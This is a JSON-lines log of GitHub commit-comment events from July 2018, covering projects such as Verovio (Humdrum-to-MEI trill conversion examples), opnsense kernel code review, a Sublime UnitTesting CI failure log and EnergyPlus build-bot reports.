{"id":"7931823996","type":"CommitCommentEvent","actor":{"login":"Ghabry"},"repo":{"name":"EasyRPG/Player"},"payload":{"comment":{"id":29628529,"position":null,"line":null,"path":null,"commit_id":"e7558fd747f6d7fa16ba60a6047593b848070636","created_at":"2018-07-07T05:52:10Z","updated_at":"2018-07-07T05:52:10Z","author_association":"MEMBER","body":"Dies this break the changeHP Event command?"}},"created_at":"2018-07-07T05:52:10Z"}
{"id":"7931824258","type":"CommitCommentEvent","actor":{"login":"SYAVA125"},"repo":{"name":"SYAVA125/Exercise3"},"payload":{"comment":{"id":29628530,"position":null,"line":null,"path":null,"commit_id":"9668ede999fa9c295a1c88a4ef5670e0e96ca998","created_at":"2018-07-07T05:52:24Z","updated_at":"2018-07-07T05:52:24Z","author_association":"OWNER","body":"Greeting added"}},"created_at":"2018-07-07T05:52:24Z"}
{"id":"7931826365","type":"CommitCommentEvent","actor":{"login":"craigsapp"},"repo":{"name":"rism-ch/verovio"},"payload":{"comment":{"id":29628534,"position":null,"line":null,"path":null,"commit_id":"39ad887904eb2fc71bc6351560c735a772b4fc3d","created_at":"2018-07-07T05:54:40Z","updated_at":"2018-07-07T05:54:40Z","author_association":"CONTRIBUTOR","body":"This commit handles two cases previously unaddressed in the humdrum-to-mei converter where there is a trill extension line at the end of the music.\r\n\r\nFirst, here is a case where there is a barline at the end of the music:\r\n\r\n<img width=\"922\" alt=\"screen shot 2018-07-07 at 7 47 19 am\" src=\"https://user-images.githubusercontent.com/3487289/42407332-5ddd0b48-81ba-11e8-9c11-acc65136baa7.png\">\r\n\r\n(with the trill line now being displayed)\r\n\r\nHumdrum test data:\r\n\r\n```\r\n**kern\r\n*clefG2\r\n*M8/8\r\n=\r\n1eett\r\n16ddqLL\r\n=\r\n1cc\r\n=\r\n[1ffTT\r\n=\r\n1ff]TTT\r\n=\r\n*-\r\n```\r\n\r\nAnd conversion to MEI:\r\n\r\n```xml\r\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\r\n<?xml-model href=\"http://music-encoding.org/schema/4.0.0/mei-all.rng\" type=\"application/xml\" schematypens=\"http://relaxng.org/ns/structure/1.0\"?>\r\n<?xml-model href=\"http://music-encoding.org/schema/4.0.0/mei-all.rng\" type=\"application/xml\" schematypens=\"http://purl.oclc.org/dsdl/schematron\"?>\r\n<mei xmlns=\"http://www.music-encoding.org/ns/mei\" meiversion=\"4.0.0\">\r\n    <meiHead>\r\n        <fileDesc>\r\n            <titleStmt>\r\n                <title />\r\n            </titleStmt>\r\n            <pubStmt />\r\n        </fileDesc>\r\n        <encodingDesc>\r\n            <appInfo>\r\n                <application isodate=\"2018-07-07T07:47:01\" version=\"2.0.0-dev-98b0ebd-dirty\">\r\n                    <name>Verovio</name>\r\n                    <p>Transcoded from Humdrum</p>\r\n                </application>\r\n            </appInfo>\r\n        </encodingDesc>\r\n        <workDesc>\r\n            <work>\r\n                <titleStmt>\r\n                    <title />\r\n                </titleStmt>\r\n            </work>\r\n        </workDesc>\r\n    </meiHead>\r\n    <music>\r\n        <body>\r\n            <mdiv xml:id=\"mdiv-0000000586838822\">\r\n                <score xml:id=\"score-0000001755174330\">\r\n                    <scoreDef xml:id=\"scoredef-0000000770634897\" midi.bpm=\"400\">\r\n                        <staffGrp xml:id=\"staffgrp-0000002116739979\">\r\n                            <staffDef xml:id=\"staffdef-0000000373369567\" clef.shape=\"G\" clef.line=\"2\" meter.count=\"8\" meter.unit=\"8\" n=\"1\" lines=\"5\">\r\n                                <label xml:id=\"label-0000001598517726\" />\r\n                            </staffDef>\r\n                        </staffGrp>\r\n                    </scoreDef>\r\n                    <section xml:id=\"section-L1F1\">\r\n                        <measure xml:id=\"measure-L4\">\r\n                            <staff xml:id=\"staff-L4F1N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L4F1N1\" n=\"1\">\r\n                                    <note xml:id=\"note-L5F1\" dur=\"1\" oct=\"5\" pname=\"e\" accid.ges=\"n\" />\r\n                                    <note xml:id=\"note-L6F1\" dur=\"16\" oct=\"5\" pname=\"d\" grace=\"unacc\" accid.ges=\"n\" />\r\n                                </layer>\r\n                            </staff>\r\n                            <trill xml:id=\"trill-L5F1\" staff=\"1\" startid=\"#note-L5F1\" tstamp2=\"0m+9.0\" />\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L7\">\r\n                            <staff xml:id=\"staff-L7F1N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L7F1N1\" n=\"1\">\r\n                                    <note xml:id=\"note-L8F1\" dur=\"1\" oct=\"5\" pname=\"c\" accid.ges=\"n\" />\r\n                                </layer>\r\n                            </staff>\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L9\">\r\n                            <staff xml:id=\"staff-L9F1N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L9F1N1\" n=\"1\">\r\n                                    <note xml:id=\"note-L10F1\" dur=\"1\" oct=\"5\" pname=\"f\" accid.ges=\"n\" />\r\n                                </layer>\r\n                            </staff>\r\n                            <trill xml:id=\"trill-L10F1\" staff=\"1\" startid=\"#note-L10F1\" tstamp2=\"1m+9.0\" />\r\n                            <tie xml:id=\"tie-L10F1-L12F1\" startid=\"#note-L10F1\" endid=\"#note-L12F1\" />\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L11\">\r\n                            <staff xml:id=\"staff-L11F1N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L11F1N1\" n=\"1\">\r\n                                    <note xml:id=\"note-L12F1\" dur=\"1\" oct=\"5\" pname=\"f\" accid.ges=\"n\" />\r\n                                </layer>\r\n                            </staff>\r\n                        </measure>\r\n                    </section>\r\n                </score>\r\n            </mdiv>\r\n        </body>\r\n    </music>\r\n</mei>\r\n```\r\n\r\nAnd a second case where there is no barline at the end of the music:\r\n\r\n<img width=\"939\" alt=\"screen shot 2018-07-07 at 7 47 15 am\" src=\"https://user-images.githubusercontent.com/3487289/42407346-8a0fa112-81ba-11e8-9680-cd18931b4b5d.png\">\r\n\r\n\r\nHumdrum data:\r\n\r\n```\r\n**kern\r\n*clefG2\r\n*M2/2\r\n=\r\n1eett\r\n16ddqLL\r\n=\r\n1cc\r\n=\r\n[1ffTT\r\n=\r\n1ff]TTT\r\n*-\r\n```\r\n\r\nMEI conversion:\r\n\r\n```xml\r\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\r\n<?xml-model href=\"http://music-encoding.org/schema/4.0.0/mei-all.rng\" type=\"application/xml\" schematypens=\"http://relaxng.org/ns/structure/1.0\"?>\r\n<?xml-model href=\"http://music-encoding.org/schema/4.0.0/mei-all.rng\" type=\"application/xml\" schematypens=\"http://purl.oclc.org/dsdl/schematron\"?>\r\n<mei xmlns=\"http://www.music-encoding.org/ns/mei\" meiversion=\"4.0.0\">\r\n    <meiHead>\r\n        <fileDesc>\r\n            <titleStmt>\r\n                <title />\r\n            </titleStmt>\r\n            <pubStmt />\r\n        </fileDesc>\r\n        <encodingDesc>\r\n            <appInfo>\r\n                <application isodate=\"2018-07-07T07:46:58\" version=\"2.0.0-dev-98b0ebd-dirty\">\r\n                    <name>Verovio</name>\r\n                    <p>Transcoded from Humdrum</p>\r\n                </application>\r\n            </appInfo>\r\n        </encodingDesc>\r\n        <workDesc>\r\n            <work>\r\n                <titleStmt>\r\n                    <title />\r\n                </titleStmt>\r\n            </work>\r\n        </workDesc>\r\n    </meiHead>\r\n    <music>\r\n        <body>\r\n            <mdiv xml:id=\"mdiv-0000001449479326\">\r\n                <score xml:id=\"score-0000000344540514\">\r\n                    <scoreDef xml:id=\"scoredef-0000002110771217\" midi.bpm=\"400\">\r\n                        <staffGrp xml:id=\"staffgrp-0000001772316018\">\r\n                            <staffDef xml:id=\"staffdef-0000000294784227\" clef.shape=\"G\" clef.line=\"2\" meter.count=\"2\" meter.unit=\"2\" n=\"1\" lines=\"5\">\r\n                                <label xml:id=\"label-0000000540031544\" />\r\n                            </staffDef>\r\n                        </staffGrp>\r\n                    </scoreDef>\r\n                    <section xml:id=\"section-L1F1\">\r\n                        <measure xml:id=\"measure-L4\">\r\n                            <staff xml:id=\"staff-L4F1N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L4F1N1\" n=\"1\">\r\n                                    <note xml:id=\"note-L5F1\" dur=\"1\" oct=\"5\" pname=\"e\" accid.ges=\"n\" />\r\n                                    <note xml:id=\"note-L6F1\" dur=\"16\" oct=\"5\" pname=\"d\" grace=\"unacc\" accid.ges=\"n\" />\r\n                                </layer>\r\n                            </staff>\r\n                            <trill xml:id=\"trill-L5F1\" staff=\"1\" startid=\"#note-L5F1\" tstamp2=\"0m+3.0\" />\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L7\">\r\n                            <staff xml:id=\"staff-L7F1N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L7F1N1\" n=\"1\">\r\n                                    <note xml:id=\"note-L8F1\" dur=\"1\" oct=\"5\" pname=\"c\" accid.ges=\"n\" />\r\n                                </layer>\r\n                            </staff>\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L9\">\r\n                            <staff xml:id=\"staff-L9F1N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L9F1N1\" n=\"1\">\r\n                                    <note xml:id=\"note-L10F1\" dur=\"1\" oct=\"5\" pname=\"f\" accid.ges=\"n\" />\r\n                                </layer>\r\n                            </staff>\r\n                            <trill xml:id=\"trill-L10F1\" staff=\"1\" startid=\"#note-L10F1\" tstamp2=\"1m+3.0\" />\r\n                            <tie xml:id=\"tie-L10F1-L12F1\" startid=\"#note-L10F1\" endid=\"#note-L12F1\" />\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L11\" right=\"invis\">\r\n                            <staff xml:id=\"staff-L11F1N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L11F1N1\" n=\"1\">\r\n                                    <note xml:id=\"note-L12F1\" dur=\"1\" oct=\"5\" pname=\"f\" accid.ges=\"n\" />\r\n                                </layer>\r\n                            </staff>\r\n                        </measure>\r\n                    </section>\r\n                </score>\r\n            </mdiv>\r\n        </body>\r\n    </music>\r\n</mei>\r\n```\r\n\r\nThe first trill extension line in the examples are not supposed to cross over the grace note, so those will have to be fixed...\r\n"}},"created_at":"2018-07-07T05:54:40Z"}
{"id":"7931828044","type":"CommitCommentEvent","actor":{"login":"ajayns"},"repo":{"name":"ETHIndia/ETHIndia"},"payload":{"comment":{"id":29628539,"position":8,"line":264,"path":"index.html","commit_id":"414a182b1266944a2560b9f0aed11c02379d0504","created_at":"2018-07-07T05:56:20Z","updated_at":"2018-07-07T05:56:20Z","author_association":"COLLABORATOR","body":"Fixed now!"}},"created_at":"2018-07-07T05:56:20Z"}
{"id":"7931830216","type":"CommitCommentEvent","actor":{"login":"darkfriend77"},"repo":{"name":"mogwaicoin/mogwai"},"payload":{"comment":{"id":29628542,"position":null,"line":null,"path":null,"commit_id":"bbe8d35b50b0eca56828275facd7a926ec396a8f","created_at":"2018-07-07T05:58:45Z","updated_at":"2018-07-07T05:58:45Z","author_association":"CONTRIBUTOR","body":"thx"}},"created_at":"2018-07-07T05:58:45Z"}
{"id":"7931830722","type":"CommitCommentEvent","actor":{"login":"craigsapp"},"repo":{"name":"rism-ch/verovio"},"payload":{"comment":{"id":29628545,"position":null,"line":null,"path":null,"commit_id":"e22c4bdc4ad28155c7daa1c8e31efdbb4c410c89","created_at":"2018-07-07T05:59:18Z","updated_at":"2018-07-07T05:59:18Z","author_association":"CONTRIBUTOR","body":"See https://github.com/humdrum-tools/verovio-humdrum-viewer/issues/119 for more information."}},"created_at":"2018-07-07T05:59:18Z"}
{"id":"7931831528","type":"CommitCommentEvent","actor":{"login":"RyuunoAelia"},"repo":{"name":"opnsense/src"},"payload":{"comment":{"id":29628550,"position":796,"line":981,"path":"sys/net/if_stf.c","commit_id":"2bab086d417ecc50518067358b72f8c48a19b26b","created_at":"2018-07-07T06:00:09Z","updated_at":"2018-07-07T06:00:09Z","author_association":"NONE","body":"Is there really a point to having i and j in this loop ? I cannot see anywhere were they are not equal."}},"created_at":"2018-07-07T06:00:09Z"}
{"id":"7931833205","type":"CommitCommentEvent","actor":{"login":"zhaojiangbin"},"repo":{"name":"alphapapa/magit-todos"},"payload":{"comment":{"id":29628565,"position":null,"line":null,"path":null,"commit_id":"30b42000e81dbb0ce4dc79fa0797af7ef52c3c76","created_at":"2018-07-07T06:01:30Z","updated_at":"2018-07-07T06:01:30Z","author_association":"NONE","body":"I will give the branch a try in the weekend.\r\n\r\nYeah I'd drop support for ag if it is causing headaches. I have heard that ag is not actively maintained nowadays. I have used it for quite a few years. But it has become less relevant as most of my projects are in git. There is also rg now. I personally would think it's good enough to keep only git-grep. Magit-todos is an add-on to magit and git-grep works well so far. But it won't hurt to keep a capable external scanner as backup.\r\n\r\nLastly, the code for ag is already in the git history, it can be resurrected when needed."}},"created_at":"2018-07-07T06:01:30Z"}
{"id":"7931833940","type":"CommitCommentEvent","actor":{"login":"ppawlak"},"repo":{"name":"django/django"},"payload":{"comment":{"id":29628571,"position":null,"line":null,"path":null,"commit_id":"931c60c5216bd71bc11f489e00e063331cf21f40","created_at":"2018-07-07T06:02:10Z","updated_at":"2018-07-07T06:02:10Z","author_association":"NONE","body":"Thanks. I'll migrate my project to 2.0 then"}},"created_at":"2018-07-07T06:02:10Z"}
{"id":"7931836503","type":"CommitCommentEvent","actor":{"login":"RyuunoAelia"},"repo":{"name":"opnsense/src"},"payload":{"comment":{"id":29628573,"position":815,"line":1000,"path":"sys/net/if_stf.c","commit_id":"2bab086d417ecc50518067358b72f8c48a19b26b","created_at":"2018-07-07T06:04:48Z","updated_at":"2018-07-07T06:04:48Z","author_association":"NONE","body":"Does this implies that v4prefixlen can be <0 ? if yes every single previous computation are wrong and maybe wrote made buffer underrun ?"}},"created_at":"2018-07-07T06:04:48Z"}
{"id":"7931839173","type":"CommitCommentEvent","actor":{"login":"RyuunoAelia"},"repo":{"name":"opnsense/src"},"payload":{"comment":{"id":29628580,"position":815,"line":1000,"path":"sys/net/if_stf.c","commit_id":"2bab086d417ecc50518067358b72f8c48a19b26b","created_at":"2018-07-07T06:07:23Z","updated_at":"2018-07-07T06:07:23Z","author_association":"NONE","body":"forget it v4prefixlen is unsigned..."}},"created_at":"2018-07-07T06:07:23Z"}
{"id":"7931841845","type":"CommitCommentEvent","actor":{"login":"sumanusk"},"repo":{"name":"sumanusk/suman1"},"payload":{"comment":{"id":29628589,"position":null,"line":null,"path":null,"commit_id":"1a6b1a97fb269874ce79774d7de521c18a20c31a","created_at":"2018-07-07T06:10:05Z","updated_at":"2018-07-07T06:10:05Z","author_association":"OWNER","body":"kindly check and update"}},"created_at":"2018-07-07T06:10:05Z"}
{"id":"7931841930","type":"CommitCommentEvent","actor":{"login":"Hongarc"},"repo":{"name":"lamquangminh/EVKey"},"payload":{"comment":{"id":29628590,"position":null,"line":null,"path":null,"commit_id":"969e894856e409d7ed631b74d503e5660526b4ea","created_at":"2018-07-07T06:10:09Z","updated_at":"2018-07-07T06:10:09Z","author_association":"NONE","body":"Bạn ko nên commit file đã build làm gì, github có phần `releases`\r\nBạn nên update vô đó thì hay hơn."}},"created_at":"2018-07-07T06:10:09Z"}
{"id":"7931843793","type":"CommitCommentEvent","actor":{"login":"khushal87"},"repo":{"name":"khushal87/hello-world"},"payload":{"comment":{"id":29628595,"position":2,"line":2,"path":"README.md","commit_id":"4ab8fba7f4bd0d6630c13c559ba342560b926030","created_at":"2018-07-07T06:11:52Z","updated_at":"2018-07-07T06:11:52Z","author_association":"OWNER","body":"hello world display in c++\r\n"}},"created_at":"2018-07-07T06:11:52Z"}
{"id":"7931845154","type":"CommitCommentEvent","actor":{"login":"Joelmtz2"},"repo":{"name":"CyanogenMod/android_device_huawei_mt2"},"payload":{"comment":{"id":29628596,"position":null,"line":null,"path":null,"commit_id":"a35cdfca2d1335ccd292d27b5a3be25ff868fda3","created_at":"2018-07-07T06:13:10Z","updated_at":"2018-07-07T06:13:10Z","author_association":"NONE","body":"a35cdfc"}},"created_at":"2018-07-07T06:13:10Z"}
{"id":"7931845596","type":"CommitCommentEvent","actor":{"login":"ahughbank"},"repo":{"name":"ahughbank/first-entry"},"payload":{"comment":{"id":29628597,"position":null,"line":null,"path":null,"commit_id":"66901db5a62ec270eff1f37a8a3bb10d491b5b43","created_at":"2018-07-07T06:13:38Z","updated_at":"2018-07-07T06:13:38Z","author_association":"OWNER","body":"<html>\r\n<head>\r\n</head>\r\n<body>\r\n<h1>Teach Muslims</h1>"}},"created_at":"2018-07-07T06:13:38Z"}
{"id":"7931848723","type":"CommitCommentEvent","actor":{"login":"panda681"},"repo":{"name":"panda681/ScripPython"},"payload":{"comment":{"id":29628602,"position":null,"line":null,"path":null,"commit_id":"750ca1bcd45a9f090e4597c1243fa415a5e53d68","created_at":"2018-07-07T06:16:36Z","updated_at":"2018-07-07T06:16:36Z","author_association":"OWNER","body":"alguns Script em python"}},"created_at":"2018-07-07T06:16:36Z"}
{"id":"7931849952","type":"CommitCommentEvent","actor":{"login":"ahnafy"},"repo":{"name":"CMenne/House-Helper"},"payload":{"comment":{"id":29628603,"position":null,"line":null,"path":null,"commit_id":"cc63a96be8dcb70fe001368606ce3528f3595cc9","created_at":"2018-07-07T06:17:56Z","updated_at":"2018-07-07T06:17:56Z","author_association":"NONE","body":"BEST OF LUCK CHARLES!"}},"created_at":"2018-07-07T06:17:56Z"}
{"id":"7931850325","type":"CommitCommentEvent","actor":{"login":"sujanliyanagmage"},"repo":{"name":"IvanSanchez/Leaflet.ImageOverlay.Rotated"},"payload":{"comment":{"id":29628604,"position":null,"line":null,"path":null,"commit_id":"42efe2d70b8819852049d7b39d1e4f4a26634328","created_at":"2018-07-07T06:18:19Z","updated_at":"2018-07-07T06:18:19Z","author_association":"NONE","body":"i tried to integrate your plugin with angular 4 project and im getting this error when going to simulate your example.\r\n \r\n```\r\nERROR TypeError: this._updateZIndex is not a function\r\n    at NewClass._initImage (Leaflet.ImageOverlay.Rotated.js:91)\r\n    at NewClass.onAdd (Leaflet.ImageOverlay.Rotated.js:46)\r\n```\r\n"}},"created_at":"2018-07-07T06:18:19Z"}
{"id":"7931851675","type":"CommitCommentEvent","actor":{"login":"jgirardet"},"repo":{"name":"SublimeText/UnitTesting"},"payload":{"comment":{"id":29628611,"position":null,"line":null,"path":null,"commit_id":"1502c03e2a7c2f1c91f529616b07357e3718fd84","created_at":"2018-07-07T06:19:49Z","updated_at":"2018-07-07T06:19:49Z","author_association":"NONE","body":"I think this commit broke something :\r\nhttps://ci.appveyor.com/project/jgirardet/sublack\r\n```\r\n[00:00:09] git checkout -qf 1a8f40695afc250c5527aeb1711aa662f34dc69b\r\n[00:00:10] Running Install scripts\r\n[00:00:10] SET PYTHON=C:\\Python36\r\n[00:00:10] SET PATH=%PYTHON%;%PYTHON%\\Scripts;%PATH%\r\n[00:00:10] pip install black\r\n[00:00:12] Collecting black\r\n[00:00:13]   Downloading https://files.pythonhosted.org/packages/4e/b5/575cdaabf1f98ebe50c0ee85b202fcce3b8df1f21d6ed02708bc539674c3/black-18.6b4-py36-none-any.whl (81kB)\r\n[00:00:13] Collecting appdirs (from black)\r\n[00:00:13]   Downloading https://files.pythonhosted.org/packages/56/eb/810e700ed1349edde4cbdc1b2a21e28cdf115f9faf263f6bbf8447c1abf3/appdirs-1.4.3-py2.py3-none-any.whl\r\n[00:00:13] Collecting attrs>=17.4.0 (from black)\r\n[00:00:13]   Downloading https://files.pythonhosted.org/packages/41/59/cedf87e91ed541be7957c501a92102f9cc6363c623a7666d69d51c78ac5b/attrs-18.1.0-py2.py3-none-any.whl\r\n[00:00:13] Collecting toml>=0.9.4 (from black)\r\n[00:00:13]   Downloading https://files.pythonhosted.org/packages/f5/f9/044110c267e6408013b85166a7cfcd352cf85275aa8ce700aa5c0eb407ba/toml-0.9.4.tar.gz\r\n[00:00:15] Collecting click>=6.5 (from black)\r\n[00:00:15]   Downloading https://files.pythonhosted.org/packages/34/c1/8806f99713ddb993c5366c362b2f908f18269f8d792aff1abfd700775a77/click-6.7-py2.py3-none-any.whl (71kB)\r\n[00:00:15] Installing collected packages: appdirs, attrs, toml, click, black\r\n[00:00:15]   Running setup.py install for toml: started\r\n[00:00:16]     Running setup.py install for toml: finished with status 'done'\r\n[00:00:16] Successfully installed appdirs-1.4.3 attrs-18.1.0 black-18.6b4 click-6.7 toml-0.9.4\r\n[00:00:16] appveyor DownloadFile \"https://raw.githubusercontent.com/SublimeText/UnitTesting/master/sbin/appveyor.ps1\"\r\n[00:00:18] \r\n[00:00:18] Downloading appveyor.ps1 (1,271 bytes)...100%\r\n[00:00:18] .\\appveyor.ps1 \"bootstrap\" -verbose\r\n[00:00:18] [UnitTesting] bootstrapping environment...\r\n[00:00:18] VERBOSE: GET https://raw.githubusercontent.com/SublimeText/UnitTesting/master/sbin/ps/ci_config.ps1 with 0-byte payload\r\n[00:00:19] VERBOSE: received 2944-byte response of content type text/plain; charset=utf-8\r\n[00:00:19] VERBOSE: GET https://raw.githubusercontent.com/SublimeText/UnitTesting/master/sbin/ps/utils.ps1 with 0-byte payload\r\n[00:00:19] VERBOSE: received 3819-byte response of content type text/plain; charset=utf-8\r\n[00:00:19] VERBOSE: GET https://raw.githubusercontent.com/SublimeText/UnitTesting/master/sbin/ps/ci.ps1 with 0-byte payload\r\n[00:00:19] VERBOSE: received 4529-byte response of content type text/plain; charset=utf-8\r\n[00:00:19] VERBOSE: [UnitTesting] setting global constants and variables...\r\n[00:00:19] VERBOSE: [UnitTesting] creating directory junction to package under test at C:\\st\\Data\\Packages\\sublack...\r\n[00:00:19] Junction created for C:\\st\\Data\\Packages\\sublack <<===>> .\r\n[00:00:19] Cannot convert value \"st2-0.10.6\" to type \"System.Version\". Error: \"Input string was not in a correct format.\"\r\n````\r\n\r\nlike #118 "}},"created_at":"2018-07-07T06:19:49Z"}
{"id":"7931853342","type":"CommitCommentEvent","actor":{"login":"the-codepunker"},"repo":{"name":"the-codepunker/ubuntu-nvidia-mining"},"payload":{"comment":{"id":29628613,"position":null,"line":null,"path":null,"commit_id":"ac195588b3b438992824a311ae64f5f2e829926e","created_at":"2018-07-07T06:21:27Z","updated_at":"2018-07-07T06:21:27Z","author_association":"OWNER","body":"Hi @Atomic-33 ,\r\n\r\nI didn't test on 1080ti... but i see no reason why it shouldn't work. However, you will probably need to modify the clocks in occ.sh.\r\n\r\nThanks,"}},"created_at":"2018-07-07T06:21:27Z"}
{"id":"7931854879","type":"CommitCommentEvent","actor":{"login":"ahughbank"},"repo":{"name":"ahughbank/first-entry"},"payload":{"comment":{"id":29628614,"position":null,"line":null,"path":null,"commit_id":"66901db5a62ec270eff1f37a8a3bb10d491b5b43","created_at":"2018-07-07T06:22:54Z","updated_at":"2018-07-07T06:22:54Z","author_association":"OWNER","body":"<img: src=\"https://www.bing.com/images/search?view=detailV2&ccid=vnA7ymVi&id=B76B085391088EA812EC0A8DC91841C38A9E8629&thid=OIP.vnA7ymViSAC5e9Z7Cr9f_AHaHa&mediaurl=https%3a%2f%2frfclipart.com%2fimage%2fbig%2f75-6e-f2%2fbrown-round-floral-mandala-Download-Royalty-free-Vector-File-EPS-58370.jpg&exph=1000&expw=1000&q=henna+clip+art&simid=608019315386617331&selectedIndex=65&ajaxhist=0\""}},"created_at":"2018-07-07T06:22:54Z"}
{"id":"7931855728","type":"CommitCommentEvent","actor":{"login":"blackgwe"},"repo":{"name":"fkleuver/experiment"},"payload":{"comment":{"id":29628616,"position":12,"line":23,"path":"src/runtime/resources/array-repeater.ts","commit_id":"b0d59923419fd6050c5cce921bd7c0fbe8b5d0d7","created_at":"2018-07-07T06:23:44Z","updated_at":"2018-07-07T06:23:44Z","author_association":"NONE","body":"Thank you very much for all the comments / explanations!"}},"created_at":"2018-07-07T06:23:44Z"}
{"id":"7931860801","type":"CommitCommentEvent","actor":{"login":"hazwan90"},"repo":{"name":"Microsoft/vscode"},"payload":{"comment":{"id":29628634,"position":null,"line":null,"path":null,"commit_id":"c17b649304fceb103f3dd7cc338d9997be1b3a47","created_at":"2018-07-07T06:28:30Z","updated_at":"2018-07-07T06:28:30Z","author_association":"NONE","body":"c17b649"}},"created_at":"2018-07-07T06:28:30Z"}
{"id":"7931861283","type":"CommitCommentEvent","actor":{"login":"vlaidmeR"},"repo":{"name":"carterspearson/numlock-off"},"payload":{"comment":{"id":29628635,"position":null,"line":null,"path":null,"commit_id":"d03bbd22803cfba9c7411e1d9af428cb02b6a914","created_at":"2018-07-07T06:28:56Z","updated_at":"2018-07-07T06:28:56Z","author_association":"NONE","body":"\r\n+# numlock-off\r\n+Program which toggles off numlock when run"}},"created_at":"2018-07-07T06:28:56Z"}
{"id":"7931862173","type":"CommitCommentEvent","actor":{"login":"RyuunoAelia"},"repo":{"name":"opnsense/src"},"payload":{"comment":{"id":29628637,"position":895,"line":1078,"path":"sys/net/if_stf.c","commit_id":"2bab086d417ecc50518067358b72f8c48a19b26b","created_at":"2018-07-07T06:29:49Z","updated_at":"2018-07-07T06:29:49Z","author_association":"NONE","body":"I kind of fail to grasp the valid range of v4prefixlen sometimes it is handled as 0 == 32 (like here), and sometimes not like Line 1000 \"\"\"if (sc->v4prefixlen > 0 && sc->v4prefixlen < 32)\"\"\" seems to suggest.\r\nWhile 0 seems to be valid input if my understanding of Line 121  \"\"\" req.prefix = (int)strtonum(p + 1, 0, 32, &errstr); \"\"\" is correct."}},"created_at":"2018-07-07T06:29:49Z"}
{"id":"7931862831","type":"CommitCommentEvent","actor":{"login":"deltaxflux"},"repo":{"name":"FluxionNetwork/fluxion"},"payload":{"comment":{"id":29628642,"position":null,"line":null,"path":null,"commit_id":"ee73b8ec54aa746eecfb0851fe3fe74d89555c68","created_at":"2018-07-07T06:30:19Z","updated_at":"2018-07-07T06:30:19Z","author_association":"MEMBER","body":"yeah but since mdk4 is not present in most repositories I removed it."}},"created_at":"2018-07-07T06:30:19Z"}
{"id":"7931864703","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29628644,"position":null,"line":null,"path":null,"commit_id":"ea02aa2bd31654f00ef055f77c69fe89623aee44","created_at":"2018-07-07T06:31:55Z","updated_at":"2018-07-07T06:31:55Z","author_association":"NONE","body":"Refactor_UnitarySystem (rraustad) - Win64-Windows-7-VisualStudio-14: OK (2934 of 2935 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n\nFailures:\n\n\nintegration Test Summary\n * Passed: 625\n * Failed: 1\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ea02aa2bd31654f00ef055f77c69fe89623aee44-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ea02aa2bd31654f00ef055f77c69fe89623aee44-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.97%25-yellow.png)</a> \n"}},"created_at":"2018-07-07T06:31:55Z"}
{"id":"7931867135","type":"CommitCommentEvent","actor":{"login":"vlaidmeR"},"repo":{"name":"BergesIrani/Neptune"},"payload":{"comment":{"id":29628646,"position":null,"line":null,"path":null,"commit_id":"3b52294be1e306ce50499ddd3e7245f160aaeca1","created_at":"2018-07-07T06:34:19Z","updated_at":"2018-07-07T06:34:19Z","author_association":"NONE","body":".."}},"created_at":"2018-07-07T06:34:19Z"}
{"id":"7931870859","type":"CommitCommentEvent","actor":{"login":"rraustad"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29628657,"position":null,"line":null,"path":null,"commit_id":"ea02aa2bd31654f00ef055f77c69fe89623aee44","created_at":"2018-07-07T06:37:53Z","updated_at":"2018-07-07T06:37:53Z","author_association":"CONTRIBUTOR","body":"Hmm, unexpected result that I cannot reproduce..\r\n\r\n![passedunigtests](https://user-images.githubusercontent.com/5778156/42407684-b87e1b68-818e-11e8-8440-548415e25ad3.jpg)\r\n"}},"created_at":"2018-07-07T06:37:53Z"}
{"id":"7931873793","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29628667,"position":null,"line":null,"path":null,"commit_id":"bfb5e7670bf35b0559472163134c37a5363468bd","created_at":"2018-07-07T06:40:26Z","updated_at":"2018-07-07T06:40:26Z","author_association":"NONE","body":"#6763-Swimming-pool-flow-not-added-to-plant-loop-sizing (RKStrand) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2312 of 2312 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-bfb5e7670bf35b0559472163134c37a5363468bd-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-bfb5e7670bf35b0559472163134c37a5363468bd-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-bfb5e7670bf35b0559472163134c37a5363468bd-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.19%25-green.png)</a>\n"}},"created_at":"2018-07-07T06:40:26Z"}
